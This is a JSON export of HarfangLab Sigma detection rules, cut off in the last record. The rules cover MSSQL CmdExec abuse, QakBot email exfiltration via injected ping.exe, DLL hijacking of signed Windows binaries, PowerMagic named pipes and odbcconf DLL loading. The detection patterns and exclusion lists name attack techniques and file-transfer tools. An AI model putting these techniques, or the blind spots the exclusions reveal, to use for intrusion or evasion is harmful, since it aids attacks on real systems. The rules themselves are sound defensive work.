"content": "title: Suspicious Execution of cmd.exe via an MSSQL CmdExec Job\nid: 801a7bc0-ff7d-467e-91c6-47048e296a77\ndescription: |\n Detects the suspicious execution of cmd.exe via an MSSQL job using the CmdExec subsystem.\n Attackers may execute a CmdExec job in order to gain code execution on a machine hosting a compromised database engine.\n It is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\nreferences:\n - https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-cmdexec-job-step?view=sql-server-2016\n - https://book.shentoushi.top/Databases/Mssql.html\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1059/003/\n - https://attack.mitre.org/techniques/T1505/001/\ndate: 2024/07/23\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.execution\n - attack.t1059.003\n - attack.persistence\n - attack.t1505.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n GrandparentImage|endswith: '\\sqlagent.exe'\n ParentImage|endswith: '\\cmd.exe'\n\n filter_mssqltools:\n Image|endswith:\n - '\\Tools\\Binn\\\\*.exe'\n - '\\DTS\\Binn\\\\*.exe'\n - '\\COM\\\\*.exe'\n - '\\shared\\\\*.exe'\n - 'MSSQL\\\\Binn\\\\*.exe'\n - '?:\\Windows\\WID\\Binn\\SqlDumper.exe'\n ProcessSignature : 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n filter_mssqltools_unsigned:\n Image:\n - '?:\\Program Files (x86)\\Microsoft SQL Server\\80\\Tools\\Binn\\DTSRun.exe'\n - '?:\\Program Files\\Microsoft SQL Server\\\\*\\Tools\\Binn\\DTSRun.exe'\n\n exclusion_sqlplus:\n Image|endswith: '\\sqlplus.exe'\n\n exclusion_gselector:\n Image:\n - '?:\\Program Files\\RCS\\GSelector\\Database\\Backup\\zip.exe'\n - '?:\\Program 
Files\\RCS\\GSelector\\Database\\Backup\\RCS.GSelector.Services.BackupManager.ManifestWriter.exe'\n\n exclusion_restart_service:\n CommandLine:\n - 'NET START MSOLAP$KPI'\n - 'NET STOP MSOLAP$KPI'\n\n exclusion_xcopy:\n Image : '?:\\Windows\\System32\\xcopy.exe'\n\n exclusion_benign_cmd:\n Image: '?:\\Windows\\system32\\cmd.exe'\n CommandLine:\n - '?:\\Windows\\system32\\cmd.exe /S /D /c exit'\n - '?:\\Windows\\system32\\cmd.exe /S /D /c echo y'\n - '?:\\Windows\\system32\\cmd.exe /S /D /c echo.'\n - '?:\\Windows\\system32\\cmd.exe /S /D /c echo *;check_alwayson;0;AlwaysOn OK'\n\n exclusion_archive:\n Image|endswith:\n - ':\\Program Files\\7-Zip\\7z.exe'\n - '\\PKZIP.EXE'\n\n exclusion_common_export_tools:\n - Image:\n - '?:\\Windows\\System32\\ftp.exe'\n - '?:\\Windows\\System32\\forfiles.exe'\n - Image|endswith: '\\psftp.exe'\n Company: 'Simon Tatham'\n - Image|endswith:\n - '\\WinSCP.com'\n - '\\WinSCP.exe'\n Company: 'Martin Prikryl'\n - Image: '?:\\Windows\\System32\\cmd.exe'\n CommandLine|startswith: '?:\\WINDOWS\\system32\\cmd.exe /c ForFiles /'\n\n exclusion_normandinfo:\n Image: '?:\\Program Files\\Normand Info\\RADV Web\\radvwebbackup.exe'\n\n exclusion_nsca_sender:\n Image|endswith: 'NSCA\\send_nsca.exe'\n\n exclusion_conhost:\n CommandLine|endswith: '\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "801a7bc0-ff7d-467e-91c6-47048e296a77",
"rule_name": "Suspicious Execution of cmd.exe via an MSSQL CmdExec Job",
"rule_description": "Detects the suspicious execution of cmd.exe via an MSSQL job using the CmdExec subsystem.\nAttackers may execute a CmdExec job in order to gain code execution on a machine hosting a compromised database engine.\nIt is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.003",
"attack.t1190",
"attack.t1505.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8051fdf6-e79c-43be-99cd-a002fe7be9d7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086360Z",
"creation_date": "2026-03-23T11:45:34.086362Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086366Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
"https://attack.mitre.org/techniques/T1041/",
"https://attack.mitre.org/techniques/T1114/001/"
],
"name": "t1114_001_quakbot_collection_process.yml",
"content": "title: QakBot Malware Collection Detected\nid: 8051fdf6-e79c-43be-99cd-a002fe7be9d7\ndescription: |\n Detects the QakBot email exfiltration process.\n To exfiltrate emails, QakBot spawns ping.exe and injects malicious exfiltration code into it to collect emails from the device and exfiltrate them.\n It is recommended to analyze the code injected into \"ping.exe\" using a memory dump job, as well as to identify the stolen emails by looking at the filesystem telemetry.\nreferences:\n - https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/\n - https://attack.mitre.org/techniques/T1041/\n - https://attack.mitre.org/techniques/T1114/001/\ndate: 2022/04/22\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1114.001\n - attack.exfiltration\n - attack.t1041\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Malware.Qakbot\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|endswith: '\\ping.exe -t 127.0.0.1'\n ParentImage|endswith:\n - '\\explorer.exe'\n - '\\iexplore.exe'\n - '\\OneDriveSetup.exe'\n - '\\msra.exe'\n - '\\mobsync.exe'\n GrandparentImage|endswith:\n - '\\explorer.exe'\n - '\\iexplore.exe'\n - '\\OneDriveSetup.exe'\n - '\\msra.exe'\n - '\\mobsync.exe'\n - '\\rundll32.exe'\n - '\\regsvr32.exe'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8051fdf6-e79c-43be-99cd-a002fe7be9d7",
"rule_name": "QakBot Malware Collection Detected",
"rule_description": "Detects the QakBot email exfiltration process.\nTo exfiltrate emails, QakBot spawns ping.exe and injects malicious exfiltration code into it to collect emails from the device and exfiltrate them.\nIt is recommended to analyze the code injected into \"ping.exe\" using a memory dump job, as well as to identify the stolen emails by looking at the filesystem telemetry.\n",
"rule_creation_date": "2022-04-22",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1041",
"attack.t1114.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8055be23-57bb-4682-9f6d-89cd2d5f5649",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600095Z",
"creation_date": "2026-03-23T11:45:34.600098Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600106Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rmactivate.yml",
"content": "title: DLL Hijacking via rmactivate.exe\nid: 8055be23-57bb-4682-9f6d-89cd2d5f5649\ndescription: |\n Detects potential Windows DLL Hijacking via rmactivate.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rmactivate.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\msdrm.dll'\n - '\\isv.exe_rsaenh.dll'\n - '\\ssp.exe_rsaenh.dll'\n - '\\ssp_isv.exe_rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8055be23-57bb-4682-9f6d-89cd2d5f5649",
"rule_name": "DLL Hijacking via rmactivate.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rmactivate.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8057d04e-6aa4-4704-8df2-db71b9e14d77",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097908Z",
"creation_date": "2026-03-23T11:45:34.097910Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097914Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_werfaultsecure.yml",
"content": "title: DLL Hijacking via werfaultsecure.exe\nid: 8057d04e-6aa4-4704-8df2-db71b9e14d77\ndescription: |\n Detects potential Windows DLL Hijacking via werfaultsecure.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'werfaultsecure.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\faultrep.dll'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8057d04e-6aa4-4704-8df2-db71b9e14d77",
"rule_name": "DLL Hijacking via werfaultsecure.exe",
"rule_description": "Detects potential Windows DLL Hijacking via werfaultsecure.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "805af355-29f7-4a14-9fe3-f7a80b0442c8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607839Z",
"creation_date": "2026-03-23T11:45:34.607842Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607850Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/bad-magic-apt/109087/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1559_powermagic_named_pipes_connected.yml",
"content": "title: PowerMagic Malware Named Pipes Connected\nid: 805af355-29f7-4a14-9fe3-f7a80b0442c8\ndescription: |\n Detects the connection to a Named Pipe pertaining to the PowerMagic malware.\n PowerMagic is a Russian-developed espionage malware, that uses named pipes to communicate locally between its different components.\n Adversaries can use named pipes to allow different malware components to communicate with each other as well as to communicate with other infected hosts through the network via SMB.\n It is recommended to analyze actions taken by the process connecting to the named pipe and isolate infected systems if necessary.\nreferences:\n - https://securelist.com/bad-magic-apt/109087/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2023/03/24\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Malware.PowerMagic\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName:\n - '\\PipeMd'\n - '\\PipeCrDtMd'\n - '\\PipeDtMd'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "805af355-29f7-4a14-9fe3-f7a80b0442c8",
"rule_name": "PowerMagic Malware Named Pipes Connected",
"rule_description": "Detects the connection to a Named Pipe pertaining to the PowerMagic malware.\nPowerMagic is a Russian-developed espionage malware, that uses named pipes to communicate locally between its different components.\nAdversaries can use named pipes to allow different malware components to communicate with each other as well as to communicate with other infected hosts through the network via SMB.\nIt is recommended to analyze actions taken by the process connecting to the named pipe and isolate infected systems if necessary.\n",
"rule_creation_date": "2023-03-24",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "805b62d6-ab4d-48d9-b108-d72780a75680",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069887Z",
"creation_date": "2026-03-23T11:45:34.069889Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069894Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
"https://twitter.com/Kostastsale/status/1541930866959454208",
"https://attack.mitre.org/techniques/T1218/008/"
],
"name": "t1218_odbcconf_suspicious_dll_load.yml",
"content": "title: Suspicious DLL Loaded by odbcconf.exe\nid: 805b62d6-ab4d-48d9-b108-d72780a75680\ndescription: |\n Detects a suspicious DLL loaded by odbcconf.exe, a command-line tool that allows to configure ODBC drivers and data source names.\n Attackers can use odbcconf.exe to load their malicious DLLs.\n It is recommended to investigate the loaded library to determine the legitimacy of this action.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n - https://twitter.com/Kostastsale/status/1541930866959454208\n - https://attack.mitre.org/techniques/T1218/008/\ndate: 2022/06/30\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.008\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.LOLBin.Odbcconf\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName : 'odbcconf.exe'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'TeamViewer GmbH'\n - 'Citrix Systems, Inc.'\n - 'Bitdefender SRL'\n - 'Symantec Corporation'\n - 'McAfee, Inc.'\n\n exclusion_system_common_files:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Common Files\\System\\'\n - '?:\\Program Files (x86)\\Common Files\\System\\'\n\n exclusion_informix:\n ImageLoaded|startswith: '?:\\Program Files\\Informix Client-SDK\\bin\\'\n\n exclusion_bitdefender:\n ImageLoaded:\n - '?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\dlls_*\\atcuf??.dll'\n - '?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_*\\bdhkm??.dll'\n\n exclusion_mysql:\n # C:\\Program Files (x86)\\MySQL\\Connector ODBC 3.51\\myodbc3S.dll\n ImageLoaded: 
'?:\\Program Files (x86)\\MySQL\\Connector ODBC *\\myodbc3S.dll'\n\n exclusion_oracle:\n ProcessCommandLine: '?:\\windows\\SysWOW64\\odbcconf.exe CONFIG* Oracle* DSN=*|Server=*'\n ImageLoaded:\n - '?:\\ProgramData\\App-V\\\\????????-????-????-????-????????????\\\\????????-????-????-????-????????????\\Root\\\\*.dll'\n - '?:\\oracle\\product\\\\*\\client*\\BIN\\\\*.dll'\n\n exclusion_mariadb:\n ImageLoaded: '?:\\Program Files (x86)\\MariaDB\\MariaDB ODBC Driver\\maodbc*.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "805b62d6-ab4d-48d9-b108-d72780a75680",
"rule_name": "Suspicious DLL Loaded by odbcconf.exe",
"rule_description": "Detects a suspicious DLL loaded by odbcconf.exe, a command-line tool that allows to configure ODBC drivers and data source names.\nAttackers can use odbcconf.exe to load their malicious DLLs.\nIt is recommended to investigate the loaded library to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-06-30",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "80817c0a-7bb5-410a-a3cd-83171dc0be80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095906Z",
"creation_date": "2026-03-23T11:45:34.095909Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095913Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_net1.yml",
"content": "title: DLL Hijacking via net1.exe\nid: 80817c0a-7bb5-410a-a3cd-83171dc0be80\ndescription: |\n Detects potential Windows DLL Hijacking via net1.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'net1.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\DSROLE.dll'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "80817c0a-7bb5-410a-a3cd-83171dc0be80",
"rule_name": "DLL Hijacking via net1.exe",
"rule_description": "Detects potential Windows DLL Hijacking via net1.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8093156c-fb61-4f53-a780-8596f8f72ffc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080953Z",
"creation_date": "2026-03-23T11:45:34.080961Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080965Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_servicehub_testwindowstorehost.yml",
